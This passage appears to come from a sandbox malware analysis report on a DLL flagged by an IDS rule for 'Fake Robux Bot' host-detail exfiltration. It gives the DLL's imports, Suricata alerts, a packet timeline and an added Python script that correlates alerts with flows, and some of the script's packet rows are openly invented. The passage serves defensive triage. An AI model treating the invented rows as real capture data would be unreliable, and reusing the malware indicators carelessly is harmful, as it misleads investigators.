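              f'entropy={s["entropy"]:.2f} nonstd={s["non_standard_name"]} {", ".join(s["characteristics"])}')
```

Entropy near 8 in `.text` would point at packed or encrypted code; the sample's 6.48 is ordinary compiled code, and the low 2.04 in `.data` is what zero-heavy initialized data looks like. Real samples can lie about `SizeOfRawData`, so slicing past the end of the file silently yields a short buffer here; check `len(raw) == rawsize` if that matters to your triage.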
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x1f060 | 0x91 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.8689655172413793
DLL | Import
KERNEL32.dll | WinExec, WriteConsoleW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle
Name | Ordinal | Address
DllRegisterServer | 1 | 0x180001000
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T16:00:15.804529+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49832 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:25.665151+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49888 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:25.701967+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49890 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:25.715450+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49889 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:41.031749+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49971 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:48.382072+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 50012 | 162.159.136.232 | 443 | TCP
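Each Suricata alert names a 4-tuple (source IP and port, destination IP and port) that should correspond to one client connection in the packet timeline that follows. The script below is an added example, not part of the Joe Sandbox report: it groups timeline rows into flows keyed on that 4-tuple (treating the side with the lower port as the server, which holds for 80/443 against the ephemeral 49xxx ports here), attaches each alert SID to its flow, and summarizes which servers drew alerted connections. The first three packet rows are the beginning of the timeline below re-typed in delimited form; the three rows to 162.159.136.232 and their timestamps are constructed so that the first alert row has a flow to land on, since that part of the capture is not reproduced on this page.

```python
from collections import defaultdict

# Packet rows in the timeline's columns: timestamp, source port, dest port, source IP, dest IP.
# First three rows come from the timeline; the last three are constructed for this example.
PACKET_ROWS = """\
Oct 15, 2024 15:59:57.462167025 CEST | 49727 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.467012882 CEST | 80 | 49727 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:57.467089891 CEST | 49727 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 16:00:15.601000000 CEST | 49832 | 443 | 192.168.2.6 | 162.159.136.232
Oct 15, 2024 16:00:15.605000000 CEST | 443 | 49832 | 162.159.136.232 | 192.168.2.6
Oct 15, 2024 16:00:15.804000000 CEST | 49832 | 443 | 192.168.2.6 | 162.159.136.232
"""

# The first row of the Suricata table above, in the same delimited form.
ALERT_ROWS = """\
2024-10-15T16:00:15.804529+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.6 | 49832 | 162.159.136.232 | 443 | TCP
"""


def _seconds(ts: str) -> float:
    """'Oct 15, 2024 15:59:57.462167025 CEST' -> seconds since midnight (single-day capture)."""
    h, m, s = ts.split()[3].split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_packets(text: str) -> list:
    out = []
    for line in text.strip().splitlines():
        ts, sport, dport, src, dst = [f.strip() for f in line.split("|")]
        out.append({"t": _seconds(ts), "sport": int(sport), "dport": int(dport), "src": src, "dst": dst})
    return out


def parse_alerts(text: str) -> list:
    out = []
    for line in text.strip().splitlines():
        ts, sid, sig, sev, src, sport, dst, dport, proto = [f.strip() for f in line.split("|")]
        out.append({"ts": ts, "sid": int(sid), "signature": sig, "severity": int(sev),
                    "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto})
    return out


def build_flows(packets: list) -> dict:
    """Key: (client IP, client port, server IP, server port). Lower port is assumed to be the server."""
    flows = {}
    for p in packets:
        if p["sport"] > p["dport"]:
            key, direction = (p["src"], p["sport"], p["dst"], p["dport"]), "out"
        else:
            key, direction = (p["dst"], p["dport"], p["src"], p["sport"]), "in"
        f = flows.setdefault(key, {"client": key[:2], "server": key[2:], "out": 0, "in": 0,
                                   "first": p["t"], "last": p["t"]})
        f[direction] += 1
        f["first"] = min(f["first"], p["t"])
        f["last"] = max(f["last"], p["t"])
    return flows


def correlate(flows: dict, alerts: list):
    """Attach each alert SID to the flow its 4-tuple names; return (matched, unmatched) lists."""
    matched, unmatched = [], []
    for a in alerts:
        key = (a["src"], a["sport"], a["dst"], a["dport"])
        if key in flows:
            flows[key].setdefault("alerts", []).append(a["sid"])
            matched.append((a["sid"], key))
        else:
            unmatched.append((a["sid"], key))
    return matched, unmatched


def suspicious_servers(flows: dict) -> dict:
    """(server IP, port) -> number of distinct client ports whose flow carried an alert."""
    hits = defaultdict(set)
    for key, f in flows.items():
        if f.get("alerts"):
            hits[f["server"]].add(key[1])
    return {srv: len(ports) for srv, ports in hits.items()}


if __name__ == "__main__":
    flows = build_flows(parse_packets(PACKET_ROWS))
    matched, unmatched = correlate(flows, parse_alerts(ALERT_ROWS))
    for key, f in flows.items():
        print(key, f"out={f['out']} in={f['in']} dur={f['last'] - f['first']:.3f}s alerts={f.get('alerts', [])}")
    print("unmatched alerts:", unmatched)
    print("servers with alerted flows:", suspicious_servers(flows))
```

An alert with no matching flow usually means the capture and the IDS saw different traffic windows, or the rule fired on a reassembled stream whose 4-tuple was logged in the opposite direction; both are worth checking before treating the count of alerted connections as the count of exfiltration attempts. On the full timeline the six alert rows above should each land on their own client port, all against the same server.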
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:59:57.462167025 CEST | 49727 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.462594032 CEST | 49728 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.463644028 CEST | 49729 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.467012882 CEST | 80 | 49727 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:57.467089891 CEST | 49727 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.467413902 CEST | 80 | 49728 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:57.467478991 CEST | 49728 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.468442917 CEST | 80 | 49729 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:57.468525887 CEST | 49729 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.469630957 CEST | 49727 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.470742941 CEST | 49728 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.470959902 CEST | 49729 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:57.474400997 CEST | 80 | 49727 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:57.475641012 CEST | 80 | 49728 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:57.475775003 CEST | 80 | 49729 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.095881939 CEST | 80 | 49728 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.095921993 CEST | 80 | 49728 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.096070051 CEST | 49728 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:58.097490072 CEST | 80 | 49727 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.097503901 CEST | 80 | 49727 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.097635031 CEST | 49727 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:58.098251104 CEST | 80 | 49729 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.098274946 CEST | 80 | 49729 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:58.098503113 CEST | 49729 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:58.117086887 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.117120028 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.117182016 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.131674051 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.131685019 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.131742954 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.132750988 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.132767916 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.134921074 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.134932995 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.136400938 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.136451006 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.136504889 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.143564939 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.143584013 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.763081074 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.763154984 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.766522884 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.766613960 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.789027929 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.789047956 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.789949894 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.794980049 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.795053005 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.795986891 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.799068928 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.812472105 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.843410969 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.859410048 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.939058065 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.939275980 CEST | 443 | 49733 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.939321995 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:58.959649086 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.959851027 CEST | 443 | 49735 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:58.959911108 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.106091022 CEST | 49735 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.108635902 CEST | 49733 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.146372080 CEST | 49742 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.147002935 CEST | 49743 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.152956963 CEST | 80 | 49742 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.153023958 CEST | 49742 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.153279066 CEST | 49742 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.153287888 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.153341055 CEST | 49743 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.153501987 CEST | 49743 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.159796000 CEST | 80 | 49742 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.159815073 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.273785114 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.273861885 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.277044058 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.277051926 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.277317047 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.284882069 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.302254915 CEST | 49746 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:59.307244062 CEST | 80 | 49746 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:59.307318926 CEST | 49746 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:59.308444977 CEST | 49746 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:59.313397884 CEST | 80 | 49746 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:59.331406116 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.431889057 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.432121038 CEST | 443 | 49734 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.432176113 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.448352098 CEST | 49734 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.456382990 CEST | 49747 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.461345911 CEST | 80 | 49747 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.461494923 CEST | 49747 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.461673021 CEST | 49747 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.466567039 CEST | 80 | 49747 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900305986 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900347948 CEST | 80 | 49742 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900379896 CEST | 80 | 49742 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900425911 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900469065 CEST | 49742 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.900476933 CEST | 49743 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.900515079 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900542021 CEST | 80 | 49742 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.900553942 CEST | 49743 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.900588036 CEST | 49742 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.900660038 CEST | 49742 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.900661945 CEST | 49743 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.902714968 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.902755976 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.902837038 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.902950048 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.902983904 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.903048992 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.903165102 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.903183937 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.903289080 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 15:59:59.903306007 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.905865908 CEST | 80 | 49742 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.905896902 CEST | 80 | 49743 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 15:59:59.934580088 CEST | 80 | 49746 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:59.934639931 CEST | 80 | 49746 | 104.17.112.233 | 192.168.2.6
Oct 15, 2024 15:59:59.934813023 CEST | 49746 | 80 | 192.168.2.6 | 104.17.112.233
Oct 15, 2024 15:59:59.937520027 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.937566996 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 15:59:59.937647104 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.940113068 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 15:59:59.940133095 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.057195902 CEST | 80 | 49747 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.057518959 CEST | 49747 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.058398962 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.058422089 CEST | 80 | 49747 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.058440924 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.058485985 CEST | 49747 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.058512926 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.058793068 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.058809996 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.062462091 CEST | 80 | 49747 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.519571066 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.519654989 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.521919966 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.521934986 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.522187948 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.523093939 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.523159981 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.523180962 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.525026083 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.525036097 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.525284052 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.526242971 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.561738014 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.561809063 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 16:00:00.563209057 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 16:00:00.563220024 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.563733101 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.567414999 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.569542885 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 16:00:00.571400881 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.615407944 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.648597956 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.648817062 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.648885012 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.648914099 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.649015903 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.649086952 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.649096012 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.649163961 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.649286032 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.649300098 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653258085 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653378010 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653403044 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653445005 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.653456926 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653621912 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.653702974 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653748035 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.653788090 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.653798103 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.656744003 CEST | 443 | 49748 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.656804085 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.661251068 CEST | 443 | 49749 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.661298990 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.672076941 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.672143936 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.673691034 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.673698902 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.673933029 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.674993038 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.690895081 CEST | 49748 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.690912008 CEST | 49749 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.709007978 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.709239960 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.6
Oct 15, 2024 16:00:00.709309101 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 16:00:00.719440937 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.730228901 CEST | 49750 | 443 | 192.168.2.6 | 104.20.4.235
Oct 15, 2024 16:00:00.738440037 CEST | 49757 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.743469954 CEST | 80 | 49757 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.743554115 CEST | 49757 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.743700981 CEST | 49757 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.748544931 CEST | 80 | 49757 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800096035 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800278902 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800385952 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800453901 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.800478935 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800507069 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800548077 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.800657034 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.800717115 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.800733089 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.809098959 CEST | 443 | 49751 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:00.809182882 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:00.833772898 CEST | 49751 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:01.335105896 CEST | 80 | 49757 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:01.335289001 CEST | 80 | 49757 | 185.199.109.133 | 192.168.2.6
Oct 15, 2024 16:00:01.335397959 CEST | 49757 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:01.370908022 CEST | 49757 | 80 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:01.372127056 CEST | 49763 | 443 | 192.168.2.6 | 185.199.109.133
Oct 15, 2024 16:00:01.372164965 CEST | 443 | 49763 | 185.199.109.133 | 192.168.2.6
